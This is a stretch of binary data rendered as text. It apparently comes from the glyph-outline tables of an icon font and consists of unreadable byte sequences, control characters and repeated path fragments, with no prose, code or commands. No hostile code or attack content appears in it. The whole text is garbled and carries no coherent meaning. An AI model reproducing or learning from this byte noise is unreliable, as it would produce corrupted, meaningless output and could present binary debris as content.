�@)-1@%1".54>32'2>54.#"37!7'"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djcS\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%".54>327!7'"&10326150S�l??l�SS�l??l�j�djcS\\ST]] ?l�SS�l??l�SS�l?AHH��@ @@ @� �@-BO\'77''/77''71".54>32'2>54.#"351"&54632'2654&#"3�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�SL�d::d�LL�d::d�L!//!!//!0��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ � �@,8'77''/77''72>54.#"7"&54632�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�S!//!!//0��?l�SS�l??l�SS�l?�/!!//!!/� �@-BO\'77''/77''71".54>32'2>54.#"351"&54632'2654&#"3�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�SL�d::d�LL�d::d�L<TT<<TT<.BB..BB.0��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ � �@,877'7''77'7''".54>32'2654&#"�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�S<TT<<TT0��?l�SS�l??l�SS�l?�/!!//!!/� �@$9N[hu�65'.'..'&&'7>71".54>32'2>54.#"31"&54632'2654&#"352654&#"3!2654&#"3
1/@eH"%%"He@/1
S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%%



 



(/W	8

8	W/��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 







� �@#7CO[g&57>7>>7667'.2>54.#""&54632'"&54632'2654&#"!"&54632
1/@eH"%%"He@/1
S�l??l�SS�l??l�=(88((88(%%%%


-


(/W	8

8	W/�?l�SS�l??l�SS�l?�8((88((8 %%%% 







� �@$9N[h65'.'..'&&'7>71".54>32'2>54.#"32654&#"3!2654&#"3
1/@eH"%%"He@/1
S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



(/W	8

8	W/��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� �@#7CO&57>7>>7667'.2>54.#""&54632!"&54632
1/@eH"%%"He@/1
S�l??l�SS�l??l�=





(/W	8

8	W/�?l�SS�l??l�SS�l?�







� �@f{�����9.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'"&10326150#1>3#"&'.'.'.7!#"&'.'.7>7212654&#"3!2654&#"3DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�SS\\ST]]T��C4

*



*

4C�n



 



z
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�@ @@ @V	*			$

$			*	V







� �@G[i����1623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"72610#"&150>3#"&'.'.'.7!#"&'.'.7>722654&#"!2654&#"'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�RT]]TS\\�C4

*



*

4C�n


-


i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�@ @@ @V	*			$

$			*	V







� �@dy�1.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'"&10326150#DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�SS\\ST]]Tz
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�@ @@ @� �@FZh623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"72610#"&150'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�RT]]TS\\i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�@ @@ @� �@f{�9.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'326=30+5DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�S_ (�z
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�( � �@G[j1623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"7326=30+5'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�4_ (�i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�( ���.b54&#".#"4&#".#".32>5"&'.765463234632354632354632#�/!)
/!!/
!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�!/		!//!�/!,/"G^vH1D*+Jc8�YHOtS2V5jPp��0�2WA&� d`=#81"&'.76546323>714632354632354632d&AX1[s*/N3
p2 2WA&YHOtS2V5�PL��0L0�� �`.b4&#".#".#"54&#".32>5"&'.764632354632354632354632#�/!!/
)
/!!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW20�!//!`		�!//!�,/"G^vH1D*+Jc8�YHOtS2V5J��P00���2WA&�@`@654&#"#4&#".32>54&#"#54&#"#` 0n
1L/
 j?2WA&  0P0��4V
3RuO"1<&AW2��0���-a4&#"54&#"4&#".#".32>5"&'.7646323463234632354632#�/!

/!

/!!/
!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�!/ !/	!//!/!�,/"G^vH1D*+Jc8�YGOuR3
V5J��p�������2WA&� _`654632354632#81"&'.764632346323 &AW2Zt*/L1
m0  xx�����2WA&YHOtS2T4G��p��`��1<J�#"3!2654&'2654&'>54&'>54&+>.#"93#"&54632654&#"3132+32+32+32#!0<5261>7>3209`�%%p!/!/		/!�
811!&j���

@



��pPpPp0�P$6,"$* %�`%/!
/!	(	(!/<}fA3KW#H  � 
�
�`



�   ��� *$RF.6Ys> ` �`1<J%!2654&+532654&+532654&+532654&+>.#"1##3#"&54632654&#"31@�0pPpPp�	+&"&v���&% 



    B~c=.FR$G/� %`%�`



@��1<J�#"&5463!22+#".'.9'3#"32#"&5463132654&+532654&+532654&+532654&#!02132>&'0&9@�%%p!/!/		/!�
811!&j���

@



��pPpPp0�P$6,"$*`%�%/!
/!	(	(!/<}fA3KW#H  �
�`
�



�`   ��� *$RF.6Ys> ` �`1<J!2+32+32+32+#".'.1##3#"32#"&54631@�0pPpPp�	+&"&v���&% 



`   B~c=.FR$G/�%��%�



@��3n%32654&'2654&'1>54&'>54&+>.#"1#";3067>32132+32+32+32+'#"&5463h�!/	!/		/!�
811!&j�%%��h��v&"&+	�pPpPp0�

/!
/!	(	(!/<}fA3KW#H %��%@/G$RF.<cB   @
`
` �`:32+32+32+32+'#"&546;067>32��pPpPp0�

�v&"&+	   @
`
/G$RF.<cB@��3n3221+#".'.1#"&546;73032>&'132654&+532654&+532654&+532654&+#"3h�!/	!/		/!�
811!&j�%%��h��v&"&+	�pPpPp0�

�/!
/!	(	(!/<}fA3KW#H %`%@�/G$RF.<cB   @
��
` �`;32654&+532654&+532654&+532654&+#";032>&'1��pPpPp0�

�v&"&+	�   @
��
/G$RF.<cB>����6j.32>=4&#"14&#"54&#".#"#7'7'3"&'.76463234632354632354632#`/b":R'AHL%8cJ+/!
/!
/!(	,�h��h�Zt*/N2
p1   &AW2��,/"G^vH1D*+Jc8�!/	!/	�!/	$h��h� YHOtS2V5j��p��0P�2WA&��`:>3234632354632354632#"&'.76#'7�   &AX1[s*/N3
p2�h��h���p��PpP�2WA&YHOtS2V5:h��h�����7k37'#54&#".#".32>=4&#"14&#"5"&'.76463234632354632354632#��h��h�/!(	!//b":R'AHL%8cJ+/!
/!
Zt*/N2
p1   &AW2�h��h!/	/!��,/"G^vH1D*+Jc8�!/	!/	�� YHOtS2V5j��p��0P�2WA&��`;354632354632#"&'.76463234632!'7'7@  &AX1[s*/N3
p2 h��h��PpP�2WA&YGOuR3
V5J��p0h��h���>m%:32>=4&#"#54&#"#4&#"#4&#".'7'%#".'.7614632>32>321>32`2WA&   1p
2N/$_Eh��h +Jc8%LHA'R:#b//!	(!/
!/
!/ &AW2�P0P��P��5V3RuN>Th��h���8cJ+*D1Hv^G"/,!/	/!�	/!	/!� ``;%.'.764632346323546323546327'7`Sm(/N3
p2   #=Q/h��h XCOuR3
V5J��p��PpP�0TA'!h��h�����8g%7'74&#"#4&#".32>=4&#"#54&#"%#".'.7614632>32>321>32�h��h 1p
2N/*tZ2WA& +Jc8%LHA'R:#b//!	(!/
!/
!/�h��hr��P��5V3RuNHY&AW2�P��R8cJ+*D1Hv^G"/,!/	/!�	/!	/!� ``954632354632#"&'.76463234632'7'� &AX1[s*/N3
p2 h��h�`pP�2WA&YGOuR3
V5J��p��h��h���.b54&#"14&#"54&#".#".32>5"&'.76463234632354632354632#�/!

/!

/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�".!/	�!/	/!��,/"G^vH1D*+Jc8�YGOuR3
V5j��p��0P�2WA&� @`24&#"#4&#".32>54&#"#54&#"#@ 2p
3N/*s[1XA&  0��0��5V3RuNHY&AW2PpP�����(S��.#".#"1.54632>3254&'1>54&#".#"1.54>3:>3254&#"14&#"54&#".#".32>51"&'.76463234632354632354632#)-
)T<1<T!#gI5Ig#+5!8L+9+L8!5+�/!

/!

/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2?)Z.<TT<.Z)�G)IggI)G']7+L8!!8L+7]���".!/	�!/	/!��,/"G^vH1D*+Jc8�YGOuR3
V5j��p��0P�2WA&��`� Cv>54&#".#"5463214632>54&#"*#".5467>32'4&#"#4&#".32>54&#"#54&#"#�B.#7

/A/!

/!!/#U;&?<T#+5bFG)Ig6*  2p
3N/*s[1XA&  �(.B%B.(N!/!//!x>&<T#T<%?%T3Gf#gI3T���0��5V3RuNHY&AW2PpP ����	Bw3#5377'7#53#554&#"14&#"54&#".#".32>5"&'.76463234632354632354632#1��g� �4�g� ��/!
/!
/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�� �k�� �k���!/	!/	�!/	/!��,/"G^vH1D*+Jc8�YHOtS2V5j��p��0P�2WA&@����	F73#53'7#53#54&#"#4&#".32>54&#"#54&#"#`��g� @��g� @ 1p
2N/*tZ2WA&  U�� �k�� �k{��0��5V2StOHY&AW2PpP$����Bx3#53'7#53#554&#"54&#"54&#".#".32>51"&'.76463234632354632354632#9��g� ��h� ��."

."

.")	
!//b":R'BGL%9cJ*��Zs+/M3
p1   %AX2�� �l��� �k��ʿ!/!/	�!/	/"��,/"G^wG1D+*Jc9�YGOuR3
V5j��p��/O�2WB%D����F3#53'7#53#5%4&#"#4&#".32>54&#"#54&#"#��g� ��h� �� 1p
3M/*tZ2WB%  �� �l��� �k����/��5V
3RuOGY&AW2PpPP ����+Z�.54>321'70"1'7.#"701#'754&#"14&#"54&#".#".32>5"&'.76463234632354632354632#�!8L+Sq!ODIgEN!qSW."

."

."(	
!//b":R'BGL%8dI+��Zt*/N2
p1   &AW22+L8!Sq!NEgIDO!qS���".!/	�!/	/!��,/"G^vH1D*+Id8�YGOuR3
V5j��p��0P�2WA&@����+^.54>321'70"1'7.#"701#'7%4&#"#4&#".32>54&#"#54&#"#�!8L+Sq!ODIgEN!qS7 1p
2N/*tZ2WA&  2+L8!Sq!NEgIDO!qS���0��5V
3RuOGY&AW2PpP~����7n#'73>32>32>321>32#".'.7612>50=4&#"#54&#"#54&#"#4&#".3��h��h�,!/
)!/
!/+Jc8%LHA'R:"b/2WA&   1p
2N/*tZ�h��h$/!�	/!	/!�8cJ+*D1Hv^G"/,� (BW/88�P0PpP��5V2StOHY��`:>32354632354632354632#"&'.76#'7�   &AX1[s*/N3
p2�h��h��АpPpP�2WA&YHOtS2V5:h��h�����6n3'7'7#>32>321>32#".'.7646322>50=4&#"#54&#"#54&#"#4&#".31��g��g�
)!/
!/+Jc8%LHA'R:#b//!,r2WA&   2p
2N/*tZh��h�	/!	/!�8cJ+*D1Hv^G"/,!/%�(BW/77�P0PpP��5V3RuNHY�``;354632354632354632#"&'.764632!'7'7#�   &AX1[s*/N3
p2h��h����pPpP�2WA&YGOuR3
V5Jh��h��`>m%>50=4&#"#54&#"#54&#"#4&#".'7'%#".'.7614632>32>321>32�/R<#   1p
2N/(mSh��h+Jc8%LHA'R:#b//!!/
)!/
!/!*AT-77�P0PpP��5V3RuNDX"h��h���8cJ+*D1Hv^G"/,!//!�		/!.!�@`@;%.'.7646323546323546323546327'7`Sm(/N3
p2   #=Q/h��h@XCOuR3
V5J�АpPpP�0TA'!h��h����`.h54&#"14&#".#"54&#".32>54632354632#"&'.764632354632'7'1�/!

/!)

/!!//b":R'AHL%8cJ+� &AW2Zt*/N2
p1 h��h�".!/	�!//!��,/"G^vH1D*+Jc8P�/WB(YGOuR3
V5j��p��h��hR�@`@954632354632#"&'.764632354632'7'� &AX1[s*/N3
p2 h��hPpP�2WA&YGOuR3
V5J�А�nh��h"��`7g%2>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32p2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/ (BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!��@`@24&#"#4&#".32>54&#"#54&#"#` 2p
3N/*s[1XA&  p�0��5V3RuNHY&AW2PpP�����!5l�>54.#"5.546321'>54&#"546322>50=4&#"#54&#"#54&#"#4&#".3%#".'.7614632>32>321>32Z!8L++L8!5+#gIIg	:T<<TB..BP2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/X="+L8!!8L+7]'G)IggI 9.<TT<.[/AA/�(BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!��`�"7j>54&#"5.54632:329'>54&#"546324&#"#4&#".32>54&#"#54&#"#J
gIIg5+#T<;U

JB./A/!!/` 2p
3N/*s[1XA&  |+IggI3T%?%<TT<)(.BB.(N!//!NR�0��5V3RuNHY&AW2PpP�����Kz>54&#"546322>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32 T<<TB..BP2WA&   2p
2N/*tZ+Jc8%LHA'R:#b//!!/
)!/
!/�.<TT<.Z/AA/�(BW/77�P0PpP��5V3RuNHY�8cJ+*D1Hv^G"/,!//!�		/!.!� ``F>54&#"546324&#"#4&#".32>54&#"#54&#"#B..B/!!/` 1p
2N/*tZ2WA&  �(.BB.(N!//!��0��5V2StOHY&AW2PpP�����Az�35#5#"&5467".'.764632>32>32>32#952>50=4&#"#54&#"#54&#"#4&#".392654&#"31�H@)7B..B7)p%LHA'R:#b//!!/
)!/
!/+Jc82WA&   2p
2N/*tZ�<TT<<TT< _?*.BB.*?��*D1Hv^G"/,!//!�		/!.!�8cJ+ (BW/77�P0PpP��5V3RuNHY�T<<TT<<T���`�%2e35#5#"&5467>54&#"546322654&#"34&#"#4&#".32>54&#"#54&#"#�H@(8B./A7)�B./A/!!/�;UU;<TT<� 2p
3N/*s[1XA&   _?*.BB.*?�(.BB.(N!//!0T<<TT<<Tp�0��5V3RuNHY&AW2PpP`����-d�.#".'.5463257>54&#"546322>50=4&#"#54&#"#54&#"#4&#".3%#".'.7614632>32>321>32`:"<T<.
B."6�T<<TB..BP2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/KT<2L
3.B$3J.<TT<.[/AA/�(BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!�� �`1d<54&#".'.5463297>54&#"546324&#"#4&#".32>54&#"#54&#"#�K55KF2%8(#5		�B..B/!!/` 1p
2N/*tZ2WA&  �5KK53J
	
1 (8-"�(.BB.(N!//!��0��5V2StOHY&AW2PpP�����	
O3570&'!7'77'2>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32� �dd@}}�}}%cd�2WA&   2p
2N/*tZ+Jc8%LHA'R:#b//!!/
)!/
!/���RQQ��QQ��(BW/77�P0PpP��5V3RuNHY�8cJ+*D1Hv^G"/,!//!�		/!."����`�	
I3570&'!7'77'4&#"#4&#".32>54&#"#54&#"#� �dd@}}�}},cd� 1p
2N/*tZ2WA&  ���RQQ��QQ���0��5V3RuNHY&AW2PpP.��5i.32>=4&#"4&#".#".#"#7'7'"&'.7646323463234632354632#`/b":R'AHL%8cJ+/!

/!)(	!/�h��hZt*/N2
p1   &AW2��,/"G^vH1D*+Jc8�".!/		/!h��h�@YGOuR3
V5j��p��0���2WA&��`;3.32>54&#"#4&#"#4&#"#4&#"1#7'7��2p
3N/*s[1XA&   �h�����5V2StOHY&AW2P0��P��0h��M��6j54&#".#".#".32>=4&#"537'#"&'.7646323463234632354632#�/!)(	!//b":R'AHL%8cJ+/!

�h��h�Zt*/N2
p1   &AW2!/		/!��,/"G^vH1D*+Jc8�".�h��h� YGOuR3
V5j��p��0���2WA&��`;#.#"#4&#"#4&#".32>54&#"#37'a�  2p3N.+s[1XA& �h��h���P��0��5V3RuNHY&AW2P h��h���;i%'7'>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32`h��h/R<#   1p
2N/(mS +Jc8%LHA'R:#b//!	()!/
!/ "h��h��'AT0�P��P��P��5V
3RuOCX�8cJ+*D1Hv^G"/,!/		/!�.!� ``;>54&#"#4&#"#4&#"#4&#".1'7�0Q<#   2p
3N/(oQh��B��'AU0P0��P��0��5V3RuNDW!h�����9h4&#"#4&#".32>=4&#"#4&#"7'7#".'.7614632>32>32>32` 1p
2N/*tZ2WA& h��h +Jc8%LHA'R:"b//!	()!/
!/�P��P��5V2StOHY&AW2�P��h��h"�8cJ+*D1Hv^G"/,!/		/!�	/!�� ``8%4&#"#4&#".32>54&#"#4&#"7'7` 2p
3N/*s[1XA& h��h�r��0��5V3RuNHY&AW2P0��h��h���3b%12>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32p2WA&   1p
2N/*tj+Jc8%LHA'R:"b//!	()!/
!/ &AW2�P��P��P��5V2StOHY�8cJ+*D1Hv^G"/,!/		/!�	/!�� ``24&#"#4&#".32>54&#"#4&#"#` 2p
3N/*s[1XA&  0��0��5V3RuNHY&AW2P0�����`�9q��>321>54&#".#".#"54671>32>329>54&#".#".#"1.54>3:>321623212>=4&#"#4&#"#4&#"#4&#".%#".'.7614632>32>32>32f
.BT<	11	<T)
--�#gI55Ig#+5!8L+99+L8!5+�2WA&   1p
2N/*tj+Jc8%LHA'R:"b//!	()!/
!/8B.;.<TT<.[)�G)IggI)G']7+L8!!8L+7]��&AW2�P��P��P��5V2StOHY�8cJ+*D1Hv^G"/,!/		/!�	/!���`�0^�>54&#"1.#".#"154632146321>32>54&#*#1.#"*#"1.5467>32'4&#"#4&#".32>54&#"#4&#"#B.

7"#7

/A/!

/!!/
!/#U;?%&?<T#+5bFG))FFb6*� 2p
3N/*s[1XA&  b(.B%%B.(N!/!//!/!N*>&<T##T<%?%T3Gf##fG3T���0��5V3RuNHY&AW2P0�����@�#.8BFJT^hlp5'7'!467%5'7'!467"34&#112#546"354&#3535"34&#12#546"354&#3535@h��h6J��J6`h��h6J��J6��.B�B.!/�/!`P���.B�B.!/�/!`P����h��h�Q8�P�8Q`�h��h�R7��8QA/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  ���@�#-15?CG5'7'!4675'7'!467"354&#3535"354&#3535�h��h6J��J6��h��h6J��J6!/�/!P���!/�/!P���~�h��h�R8��8R`�h��h�R7�O�7R@/!pp!/��  @  �/!pp!/��  @  ���@@!=GQ[eim%>54.#"5.54>325>54.#"54>32'12!46"34&#12#546"354&#3535�:F5[zFFz[5F:,40Ro??oR04,&AW22WA&!8L++L8!�<T��T<.B�B.!/�/!`P����.�PFz[55[zFP�.**rB?oR00Ro?Br*f<!2WA&&AW2!<x+L8!!8L+�T<��<T B.��.B /!pp!/ PP�  @  ���@@	=Y12!46"354&#35357>54.#"5.54>325>54.#"54>32�<T��T<!/�/!P����:F5[zFFz[5F:,40Ro??oR04,&AW22WA&!8L++L8!�T<��<T@/!pp!/��  @  .�PFz[55[zFP�.**rB?oR00Ro?Br*f<!2WA&&AW2!<x+L8!!8L+���@�#-7AEIS]gko%#4632#7'7%#4632#7'7"34&#12#546"354&#3535"34&#12#546"354&#3535@�T<<T�h��h`�T<<T�h��h��.B�B.!/�/!`P���.B�B.!/�/!`P�����<TT<�P�h��h�<TT<���h��h�A/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  ���@`#-15?CG%#4632#7'7%#4632#7'7"354&#3535"354&#3535@�T<<T�h��h`�T<<T�h��h��!/�/!P���!/�/!P�����<TT<�P�h��h�<TT<��h��h�/!pp!/��  @  �/!pp!/��  @  @����&0:>BLV`dh!46323'7'7%12!46"34&#112#546"354&#3535"34&#12#546"354&#3535���T<<T�h��h�N<T��T<.B�B.!/�/!`P���.B�B.!/�/!`P�����`<TT<Ph��h�T<�P�<T A/�p�/A /!pp!/ PP�  @  �B.��.B /!pp!/ PP�  @  @����%)-7;?!46323'7'7%12!46"354&#3535"354&#3535���T<<T�h��h�N<T��T<!/�/!P���!/�/!P�����`<TT<Ph��h�T<�P�<T@/!pp!/��  @  �/!pp!/��  @  >����%/37AKU_cg>32!#'7%"34&#112#546"354&#353512!46"34&#12#546"354&#3535AQ8<T���h��hR.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P����6JT<�P�h��h`A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  @����#-7;?>32!#'737"354&#353512!46"354&#3535BR8;U���h��h".�/!P���;U��T<".�/!P����6JT<�P�h��h@/!pp!/��  @  T<��<T@/!pp!/��  @  ��!+5?IMQ>54.#"5.54>3212!46"34&#12#546"354&#3535�,4+Jc88cJ+4,"&AW22WA&"�<T��T<.B�B.!/�/!`P���!%l>8cJ++Jc8>l%, T/2WA&&AW2/T 3T<��<T B.��.B /!pp!/ PP�  @  ��	=12!46"354&#35357>54.#"5.54>32�<T��T<!/�/!P���`,4+Jc88cJ+4,"&AW22WA&"�T<��<T@/!pp!/��  @  A%l>8cJ++Jc8>l%, T/2WA&&AW2/T 	`����%/9=ANp35#5#"&546712!46"34&#12#546"354&#35352654&#"3>54.#"5.54>32 @@)7B..B7)�p<T��T<.B�B.!/�/!`P���P<TT<<TT<�,4+Jc88cJ+4,"&AW22WA&" _?*.BB.*?�T<��<T B.��.B /!pp!/ PP�  @  �T<<TT<<T��%l>8cJ++Jc8>l%, T/2WA&&AW2/T `����"&*7;]#"&5467312!46"354&#35352654&#"3735>54.#"5.54>32 )7B..B7) �P<T��T<!/�/!P���P<TT<<TT<@��,4+Jc88cJ+4,"&AW22WA&"?*.BB.*?�T<��<T@/!pp!/��  @  �T<<TT<<T�  �%l>8cJ++Jc8>l%, T/2WA&&AW2/T ����`	'+/37;@D12!46"34&#12#546"354&#3535357#3!35#7'<T��T<.B�B.!/�/!`P���` �qqj���ࠠjqq�T<��<T B.��.B /!pp!/ PP�  @  ���jqr�    rq	����`	#',012!46"354&#3535357#3!35#7'<T��T<!/�/!P���` �qqj���ࠠjqq�T<��<T@/!pp!/��  @  ���jqr�    rq~����#-7;?3'7'7#!#'73>32'"34&#12#546"354&#3535��h��h���h��h�Q87R�.B�B.!/�/!`P���h��h�h��h6JJ6`B.��.B /!pp!/ PP�  @  ~����#'+3'7'7#!#'73>32'"354&#3535��h��h���h��h�Q87R�!/�/!P���h��h�h��h6JJ6@/!pp!/��  @  ~����#-7AEI3'7'7#!#'73>75'7'9'"34&#12#546"354&#3535��h��h���h��h�H2h��h2H�.B�B.!/�/!`P���h��h�h��h2H�h��h�H2`B.��.B /!pp!/ PP�  @  ~����",04>715'7'3'7'7#!#'737"354&#3535�H2h��h2H�h��h���h��hÏ!/�/!P���2H�h��h�H2h��h�h��h@/!pp!/��  @  ��@	(,0:DNX\`��12!46"34&#112#546"354&#353512!46"34&#12#546"354&#35357>54.#".#"54>32>32>54.#".#".54>32>32P<T��T<.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P����&AW2HtD&2WA&!8L+,MpJ+L8!,40Ro?I}*8?oR04,:F5[zF3.�KFz[5F: T<�P�<T A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  �<!2WA&M<&AW2!<x+L8!"E[!8L+�*rB?oR0@5
0Ro?Br**.�PFz[54<5[zFP�.
��@	%/37_�12!46"354&#353512!46"354&#35357>54.#".#"54>32>32>54.#".#".54>32>32P<T��T<!/�/!P���<T��T<!/�/!P����&AW2HtD&2WA&!8L+,MpJ+L8!,40Ro?I}*8?oR04,:F5[zF3.�KFz[5F: T<�P�<T@/!pp!/��  @  T<��<T@/!pp!/��  @  �<!2WA&M<&AW2!<x+L8!"E[!8L+�*rB?oR0@5
0Ro?Br**.�PFz[54<5[zFP�.
@���	(,0:DNX\`�12!46"34&#112#546"354&#353512!46"34&#12#546"354&#35357>54.#".#".54>32>32P<T��T<.B�B.!/�/!`P���<T��T<.B�B.!/�/!`P���`"&AW2HtD&2WA&",4+Jc8!>$yH8cJ+4, T<�P�<T A/�p�/A /!pp!/ PP�  @  T<��<T B.��.B /!pp!/ PP�  @  m T/2WA&M<&AW2/T ,%l>8cJ+8E+Jc8>l%	@���	%/37e12!46"354&#353512!46"354&#35357>54.#".#".54>32>32P<T��T<!/�/!P���<T��T<!/�/!P���`"&AW2HtD&2WA&",4+Jc8!>$yH8cJ+4, T<�P�<T@/!pp!/��  @  T<��<T@/!pp!/��  @  m T/2WA&M<&AW2/T ,%l>8cJ+8E+Jc8>l%~����$.26>32!#'7%"34&#12#546"354&#3535�Q8<T���h��hR.B�B.!/�/!`P���6JT<��h��h`B.��.B /!pp!/ PP�  @  ~���� $9>32!#'7%"354&#3535�Q8<T���h��hR!/�/!P���6JT<��h��h@/!pp!/��  @  `����%/37!46323'7'7#'"34&#12#546"354&#3535���T<7R�h��h.B�B.!/�/!`P����<TJ6h��h�B.��.B /!pp!/ PP�  @  `����!%3'7'7#!46329'"354&#3535�h��h��T<7R�!/�/!P���h��h�<TJ6@/!pp!/��  @  �����%/375'7'!467"34&#12#546"354&#3535h��h6J��J6.B�B.!/�/!`P����h��h�R7��8QB.��.B /!pp!/ PP�  @  �����#5'7'!467"354&#3535h��h6J��J6!/�/!P����h��h�R7��8Q?/!pp!/��  @  �����%/37%7'75#4632"34&#12#546"354&#3535 h��h�T<<T�.B�B.!/�/!`P�����h��h�<TT<���B.��.B /!pp!/ PP�  @  �����#%#4632#7'7"354&#3535�T<<T�h��h!/�/!P����<TT<���h��h"/!pp!/��  @  ����	+<M#5353#73+"&=3;26='#353735#%!2#!"&=463"3!26=4&#!   `  � & % 
 
�0       � (88(��(88(%& %&���ࠠ��%&��

�``�@@��`8(�(88(�(8 &�%&�%����	+<#5353#73+"&=3;26=73#5#'#53%"3!26=4&#!   `  � & % 
 
�0       �`(88( (88(���ࠠ��%&��

�``�@@��`8(�(88(�(8����$5FO~#"&=46;5#";5#3%3532654&+5!2#!"&=463"3!26=4&#!32+%";2+"&51#1;2654&+"&546;234&+@@

``&%``@�� @&%` (88(��(88(%& %&�� @

@�&% 

 
 % &% 

 
 % �@
`
 %`&� @�`%%`8(�(88(�(8 &�%&�%`

`%%


&%%


%����$5>l#53#"&=46;#";5%532+#"3!26=4&#!32654&#%32#4&+";2+"&5131;2654&+"&546@@``%&``

@��`%&@ (88( (88(�� @

` % 
 

 %& % 
 

 %&� �&`% 
`
@@@%%`@8(�(88(�(8�@

 %


%%&


%%����!/:GP\e!2#!"&=463"3!26=4&#!##546;2#'"354&+532+#5732654&#532+#732654&# (88(��(88(%& %&��` & % @
`
 �`%&@  @

``%&@  @

�8(�(88(�(8 &�%&�%�`�%%��
  
 @%%`� @

 @%%`�@

����)6?KT!2#!"&=463354&+"357"354&+3532654&+732654&#3532654&+32654&# (88(��(88(� % &  
`
 � @&%` @

` @&%` @

�8(�(88(�(8�`�%%�``
  
 �`%%@ @

 �`%% @

����!-6@Y!2#!"&=463"3!26=4&#!532+#732654&##5353#7#"&=46;5#";5#3 (88(��(88(%& %&��`%&@  @

�  `  �@

``&%``@�8(�(88(�(8 &�%&�%�@%%`�@

 �ࠠ�`@
`
 %`&� ����%/H!2#!"&=4633532654&+32654&#35#'#3%#"&=46;5#";5#3 (88(��(88( @&%` @

�`  `   @

``&%``@�8(�(88(�(8��`%% @

 �ࠠ�`@
`
 %`&� ����!+7@KU!2#!"&=463"3!26=4&#!535#3535%532+#732654&#732+5326=4&# (88(��(88(%& %&����� `�`%&@  @

``%&` @

�8(�(88(�(8 &�%&�%�@ �`  @%%`�@

 &`%� �
`
����&/:D!2#!"&=463535#3535%3532654&+32654&#7326=4&+326=4&# (88(��(88(��� `� @&%` @

``&%` @

�8(�(88(�(8�@ �`  �`%% @

 �%`& �
`
����!.[hq!2#!"&=463"3!26=4&#!'#353735#46;2+"&53;2654&+532654&+"#532+#5732654&# (88(��(88(%& %&��P0       & %

& % 
 

  

 
�`%&@  @

�8(�(88(�(8 &�%&�%�`�@@��@%%		%%


 


@%%`� @

����KXa!2#!"&=463'#353735#346;2+32+"&5#;2654&'>54&+"#3532654&+732654&# (88(��(88(P0        
 

  

 
 % &

% &� @&%` @

�8(�(88(�(8�`�@@��@


 


%%		%%�`%%@ @

����!$/<IR!2#!"&=463"3!26=4&#!#73535#5#%'#353735#532+#5732654&# (88(��(88(%& %&���::    `��0       @`%&@  @

�8(�(88(�(8 &�%&�%�Pp@@ �� @`�@@��@@%%`� @

����+8A!2#!"&=46353535#5#%'#353735#3532654&+732654&# (88(��(88(�::    `��0       @ @&%` @

�8(�(88(�(8�PP @@ �� @`�@@��@�`%%@ @

����!2CPW!2#!"&=463"3!26=4&#!32+"&=463";26=4&+'#353735#73#'3 (88(��(88(%& %&�� %& %&

 

 �0       P0 @ @ �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
@`�@@�ਨ������!2?F!2#!"&=463";26=4&+";26=4&+'#353735#'#37# (88(��(88(&% &% 

 

